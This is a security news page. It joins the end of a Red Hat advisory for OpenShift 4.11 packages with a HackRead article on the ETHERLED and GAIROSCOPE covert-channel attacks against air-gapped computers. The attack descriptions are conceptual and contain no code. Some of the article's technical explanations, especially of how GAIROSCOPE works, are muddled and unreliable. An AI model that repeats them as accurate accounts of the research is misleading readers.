butane-debugsource-0.15.0-2.rhaos4.11.el8.s390x.rpm  
cri-o-1.24.2-4.rhaos4.11.gitd6283df.el8.s390x.rpm  
cri-o-debuginfo-1.24.2-4.rhaos4.11.gitd6283df.el8.s390x.rpm  
cri-o-debugsource-1.24.2-4.rhaos4.11.gitd6283df.el8.s390x.rpm  
ignition-2.14.0-4.rhaos4.11.el8.s390x.rpm  
ignition-debuginfo-2.14.0-4.rhaos4.11.el8.s390x.rpm  
ignition-debugsource-2.14.0-4.rhaos4.11.el8.s390x.rpm  
ignition-validate-2.14.0-4.rhaos4.11.el8.s390x.rpm  
ignition-validate-debuginfo-2.14.0-4.rhaos4.11.el8.s390x.rpm  
openshift-clients-4.11.0-202208110436.p0.gfcf512e.assembly.stream.el8.s390x.rpm  
openshift-hyperkube-4.11.0-202208101756.p0.g4f0dd4d.assembly.stream.el8.s390x.rpm

x86_64:  
NetworkManager-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-adsl-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-adsl-debuginfo-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-bluetooth-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-bluetooth-debuginfo-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-cloud-setup-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-cloud-setup-debuginfo-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-debuginfo-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-debugsource-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-libnm-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-libnm-debuginfo-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-libnm-devel-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-ovs-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-ovs-debuginfo-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-ppp-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-ppp-debuginfo-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-team-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-team-debuginfo-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-tui-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-tui-debuginfo-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-wifi-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-wifi-debuginfo-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-wwan-1.36.0-8.el8_6.x86_64.rpm  
NetworkManager-wwan-debuginfo-1.36.0-8.el8_6.x86_64.rpm  
butane-0.15.0-2.rhaos4.11.el8.x86_64.rpm  
butane-debuginfo-0.15.0-2.rhaos4.11.el8.x86_64.rpm  
butane-debugsource-0.15.0-2.rhaos4.11.el8.x86_64.rpm  
cri-o-1.24.2-4.rhaos4.11.gitd6283df.el8.x86_64.rpm  
cri-o-debuginfo-1.24.2-4.rhaos4.11.gitd6283df.el8.x86_64.rpm  
cri-o-debugsource-1.24.2-4.rhaos4.11.gitd6283df.el8.x86_64.rpm  
ignition-2.14.0-4.rhaos4.11.el8.x86_64.rpm  
ignition-debuginfo-2.14.0-4.rhaos4.11.el8.x86_64.rpm  
ignition-debugsource-2.14.0-4.rhaos4.11.el8.x86_64.rpm  
ignition-validate-2.14.0-4.rhaos4.11.el8.x86_64.rpm  
ignition-validate-debuginfo-2.14.0-4.rhaos4.11.el8.x86_64.rpm  
openshift-clients-4.11.0-202208110436.p0.gfcf512e.assembly.stream.el8.x86_64.rpm  
openshift-clients-redistributable-4.11.0-202208110436.p0.gfcf512e.assembly.stream.el8.x86_64.rpm  
openshift-hyperkube-4.11.0-202208101756.p0.g4f0dd4d.assembly.stream.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-30629  
https://access.redhat.com/security/updates/classification/#low

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYwUXa9zjgjWX9erEAQjjtA/7B4PRy5mp+SWD2Ir4zQG9BiRF4swA18Jy  
xS/C7Z/ZN22oGH8aF1W2aXsQJ9UlTPxm892k6UbpnghZdJQoZdZY86K3MeHi6u7e  
CxZP1I/WV36czTOVNVm80p230nLnd03Y1pHcGwKPK+W0mUivnc2dQAZyI07qbXgq  
H7vyv7yXyKWTiB8biMeUmsWtzgUzIJXU5WlVfDZGcWF2CnhRuoEr9GDsv5e+gbgL  
eHq/ohji5h3+sNstpHly6jOhk3wC3PwuvFDf0G21onPi58Lz+9FGukufPvaNvoao  
iHdSDl5tq/ic2lDmSqW7ltLED2q/wJtfErIKXcwrRQVXgQWkqPyR5jCtTjwBv1w6  
o2WAN/oXs+jsukMD4tGVUgU6odXtrxRgZwLOw0uFB9SpavBRSFyhSK+0Oh1iqm9S  
92XzbUKaesoLp+EQC2RDqMzrEUsfk9h7O74cUk1H42rF9daYjIAvujIwW0ZZT24u  
oCSby9T9xwzEL3n+EGv2ISL6PP+8baO6xp3Y6IHKWASiuwhyOIDB2iBOZW8Q3+ud  
vWD8IaljuvIW9RYBd64vlirUno7v8y16y5kCVmW3A1OO2BkxtSv/SbcrnG3Qm2K8  
oP/6ifzNeYf2fIgYjy2eXZ212pejwIXAnzKao42FAf5I4W/N7k+MnmncvYUMayUp  
C+BRJVVBdmIqKi  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6102-01

By Deeba Ahmed
Researchers have demonstrated possibilities in which attackers can use resonance frequency in Gyroscope and network card LEDs to exfiltrate data from air-gapped PC.
This is a post from HackRead.com Read the original post: ETHERLED and GAIROSCOPE Attacks Allow Data Exfiltration from Air-gapped PC

In two research papers published by Israeli researcher Mordechai Guri, exclusive details of novel methods for exfiltrating data from air-gapped systems and **MEMS gyroscopes** have been revealed. The methods are dubbed ETHERLED and Gairoscope.

**How does ETHERLED Works?**

For your information, **air-gapped PCs** refer to computers installed in critical infrastructures, weapon control units, and other sensitive locations. These computers stay isolated from the public networks to ensure optimum data security. Hence, the system uses air-gapped networks in which a network card remains an integral component.

According to **Guri’s research** , this card is prone to infection if an attacker can lace it with specially designed malware and replace the driver with a different version. This new version can modify the LED color and blinking mechanism to transmit encoded data waves.

The attacker captures signals with a camera directly connecting to the air-gapped system computer card’s LED lights. These signals are converted into binary to **exfiltrate data**. The information is sent to a nearby smartphone without requiring a microphone to pick up sound waves.

It takes the conventional techniques of acoustic, optical, electromagnetic, and thermal approaches a notch above. However, it is more covert than other methods.

ETHERLED method is effective on any other hardware in which LEDs are used as status or operational indicators. These include printers, routers, scanners, network-attached storage devices, and other connected devices.

1.  **Stealing data from air-gapped PC by turning RAM into Wi-Fi Card**
2.  **Hackers Can Now Steal Data from Air-Gapped PCs via SATA Cables**
3.  **Hackers can steal data from air-gapped PC using screen brightness**
4.  **Malware can extract data from air-gapped PC through power supply**
5.  **Hackers can steal data from Air-Gapped PCs with microphones, speakers**

**How does GAIROSCOPE Work?**

**Gairoscope attack** on an air-gapped system relies on generating resonance frequencies on the targeted device/system. These frequencies are captured by the gyroscope sensor of a smartphone from a distance of up to 6 meters.

This attack starts by infecting the smartphones of a targeted organization’s employees with a rogue app through numerous attack vectors, including **social engineering**, infected websites, or malicious ads. Then the attacker abuses the access to obtain sensitive data like credentials or encryption keys and encodes and transmits the information by covertly sending out acoustic sound waves through the device’s loudspeaker.

An infected smartphone in close proximity detects the data transmission and listens through the device’s built-in gyroscope sensor. The data is then demodulated, decoded, and sent to the attacker through Wi-Fi due to ultrasonic corruption. This phenomenon impacts MEMS gyroscopes at resonance frequencies.

> “Our malware generates ultrasonic tones in the resonance frequencies of the MEMS gyroscope. These inaudible frequencies produce tiny mechanical oscillations within the smartphone’s gyroscope, which can be demodulated into binary information.”
> 
> Dr. Mordechai Guri

Inaudible sound, when played near the gyroscope, generates an internal disruption to the signal output, and this error can be exploited to encode/decode data. Reportedly, the data is transferred with bit rates of 1-8 bit/sec at 0-600 cm distance, and the transmitted reaches a distance of 800 cm in narrow areas.

Tag

#wifi